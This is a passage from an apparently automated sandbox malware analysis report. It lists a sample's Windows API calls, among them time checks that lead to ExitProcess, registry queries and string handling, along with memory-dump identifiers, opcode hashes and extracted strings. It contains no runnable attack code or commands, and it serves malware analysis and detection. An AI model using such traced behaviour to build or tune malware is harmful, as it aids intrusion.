                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 03b59256167ace5eb91ddead22ac479ea2d52c1be1e375799bc20b58a0e3e164
                                • Instruction ID: 792ba03a7300d0070394b1ad3d96088178593bcfd36decb7f535c7d1a38b02c8
                                • Opcode Fuzzy Hash: 03b59256167ace5eb91ddead22ac479ea2d52c1be1e375799bc20b58a0e3e164
                                • Instruction Fuzzy Hash: B8419871600206ABCB21DFAAD944BABBBF4EF44301F11815EA84997315EF38E942CB94
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 004F1B72
                                  • Part of subcall function 004F1820: lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F184F
                                  • Part of subcall function 004F1820: lstrlen.KERNEL32(00CE6D70), ref: 004F1860
                                  • Part of subcall function 004F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 004F1887
                                  • Part of subcall function 004F1820: lstrcat.KERNEL32(00000000,00000000), ref: 004F1892
                                  • Part of subcall function 004F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 004F18C1
                                  • Part of subcall function 004F1820: lstrlen.KERNEL32(00504FA0), ref: 004F18D3
                                  • Part of subcall function 004F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 004F18F4
                                  • Part of subcall function 004F1820: lstrcat.KERNEL32(00000000,00504FA0), ref: 004F1900
                                  • Part of subcall function 004F1820: lstrcpy.KERNEL32(00000000,00000000), ref: 004F192F
                                • sscanf.NTDLL ref: 004F1B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004F1BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004F1BC6
                                • ExitProcess.KERNEL32 ref: 004F1BE3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: f98ed86af0d2ef4e53cd5de86c4ac76b8eb6b9f1d671378cd1c0283c1ee66509
                                • Instruction ID: a3ebe0f4dd1f60a1f4e38911b7d51b69b4ac1e0aa489125f582d7c278f53c4f4
                                • Opcode Fuzzy Hash: f98ed86af0d2ef4e53cd5de86c4ac76b8eb6b9f1d671378cd1c0283c1ee66509
                                • Instruction Fuzzy Hash: F621E6B1518301EF8350DF65D88496BBBF8EED8214F409A1EF599C3220E774E5048BA6
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F3166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F316D
                                • RegOpenKeyExA.ADVAPI32(80000002,00CEBC90,00000000,00020119,?), ref: 004F318C
                                • RegQueryValueExA.ADVAPI32(?,00CFE500,00000000,00000000,00000000,000000FF), ref: 004F31A7
                                • RegCloseKey.ADVAPI32(?), ref: 004F31B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: a97e27b86c32ca00ea1f37d95bd20e66d1d02d672eb7e7e134b075da65dbf236
                                • Instruction ID: bc40163744e159c7f15148d33047b62542ca8273bf6c543d63bf9ffb4b6c4df2
                                • Opcode Fuzzy Hash: a97e27b86c32ca00ea1f37d95bd20e66d1d02d672eb7e7e134b075da65dbf236
                                • Instruction Fuzzy Hash: F51130B6A40209EFD710DB94DD45BBBBBBCF748711F10821AFA0592680DB7959048BA5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 3dfc108bd2e9df2342744831c01a2c546819ef5132ed00fa28baec3386fb1fb9
                                • Instruction ID: 0572aaa568ef75f5140257e8b37efd771c7dd39f36f00ac8a100f482a2d9e466
                                • Opcode Fuzzy Hash: 3dfc108bd2e9df2342744831c01a2c546819ef5132ed00fa28baec3386fb1fb9
                                • Instruction Fuzzy Hash: F941297150075CAEEB318B258D85FFB7BFC9B45308F1448EDEA8686182D2799E45CF24
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004D8996
                                  • Part of subcall function 004FA1C0: std::exception::exception.LIBCMT ref: 004FA1D5
                                  • Part of subcall function 004FA1C0: std::exception::exception.LIBCMT ref: 004FA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 004D89CD
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA188
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: 726f91929fa6fc9e2f788cec3b4af8b494e06b40cf41829b0ed65cc92a85c674
                                • Instruction ID: 97f6a2b39ec574af2574354d58f35f717e5c2ee4582a173178ff7f66612cedfa
                                • Opcode Fuzzy Hash: 726f91929fa6fc9e2f788cec3b4af8b494e06b40cf41829b0ed65cc92a85c674
                                • Instruction Fuzzy Hash: FF21EAB23006504BC7209A5CE860A7AF799DFA1761B11097FF181CB381CB75DC41C3AD
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004D8883
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA188
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 3e46c5148bc5b1bfcce8235af34382eddd2b1682fa17fbabbced6847ec8519fe
                                • Instruction ID: 7291dc2668bebcf31da0373a03cb1cc7e0e4928fe15806fe6f3d5ca0fc8d7a8b
                                • Opcode Fuzzy Hash: 3e46c5148bc5b1bfcce8235af34382eddd2b1682fa17fbabbced6847ec8519fe
                                • Instruction Fuzzy Hash: 8D31A9B5E005199FCB08DF58C8916AEBBB6EB88350F14826EE915DF384DB34AD01CBD5
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004F5922
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA188
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 004F5935
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: f2ab0dd9e27134781693bc8b8c0010659880e9ea1d892a56226dcb4078b60aff
                                • Instruction ID: f66f51383da3c64723d4c7164f7c5bce347da7ec184259711a6812a81d5d437e
                                • Opcode Fuzzy Hash: f2ab0dd9e27134781693bc8b8c0010659880e9ea1d892a56226dcb4078b60aff
                                • Instruction Fuzzy Hash: C4118270304B44CBC7358B2CE900B2A7BE1ABD2760F250A5FE3D187795C7A5D841C7A9
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,004FA430,000000FF), ref: 004F3D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F3D27
                                • wsprintfA.USER32 ref: 004F3D37
                                  • Part of subcall function 004F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004F71FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: e64aff3647baeea3c4964e155ff5342180ecc549eff9f620e6030c2f1da58ecb
                                • Instruction ID: 93851d6e4c715a4c1cc0a38308493bb8a38a8ea67ebba0f91b8642ec42641ab8
                                • Opcode Fuzzy Hash: e64aff3647baeea3c4964e155ff5342180ecc549eff9f620e6030c2f1da58ecb
                                • Instruction Fuzzy Hash: 8301C071640704FBE7105B54DC4AF6BBB68FB45B61F108215FB05D72D0DBB81900CAAA
                                APIs
                                • __getptd.LIBCMT ref: 004F9279
                                  • Part of subcall function 004F87FF: __amsg_exit.LIBCMT ref: 004F880F
                                • __amsg_exit.LIBCMT ref: 004F9299
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit$__getptd
                                • String ID: XuP$XuP
                                • API String ID: 441000147-2591469617
                                • Opcode ID: d37405e41480ef90f8a92f48b52ce9bfde115023b31fcf60c4d6cf9baa5c64bb
                                • Instruction ID: 17ef22bc8c554236c791f2be6c30e8600ce220162dde0a11bcb2156989ef04be
                                • Opcode Fuzzy Hash: d37405e41480ef90f8a92f48b52ce9bfde115023b31fcf60c4d6cf9baa5c64bb
                                • Instruction Fuzzy Hash: 0F01A132D0661DA6DB10AB2A98057BE73606F04B58F16044FEA0067691CB2C6D41EBDE
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004D8737
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA188
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 87eb18870526119309a9f552c716c1ad48c38921c6f6054aa25c62227750caf2
                                • Instruction ID: a944609aa1e007adc7b2a56c521fef169cc7379263c7da7bf16129f0877f87bf
                                • Opcode Fuzzy Hash: 87eb18870526119309a9f552c716c1ad48c38921c6f6054aa25c62227750caf2
                                • Instruction Fuzzy Hash: B0F0F033F000211F8344643E8D850AFA80756E539033AC72BE91AEF399DC34EC8285D8
                                APIs
                                  • Part of subcall function 004F781C: __mtinitlocknum.LIBCMT ref: 004F7832
                                  • Part of subcall function 004F781C: __amsg_exit.LIBCMT ref: 004F783E
                                • ___addlocaleref.LIBCMT ref: 004F8756
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID: KERNEL32.DLL$XuP$xtP
                                • API String ID: 3105635775-3980384866
                                • Opcode ID: 960b0f83bed67e801ecbcae7265d19c62827bf6865ee10e996a73c624c60998f
                                • Instruction ID: 54c7d65a17eac817767c56b428afd150eea28ed3caa86a6eb5741f9ec84c59c9
                                • Opcode Fuzzy Hash: 960b0f83bed67e801ecbcae7265d19c62827bf6865ee10e996a73c624c60998f
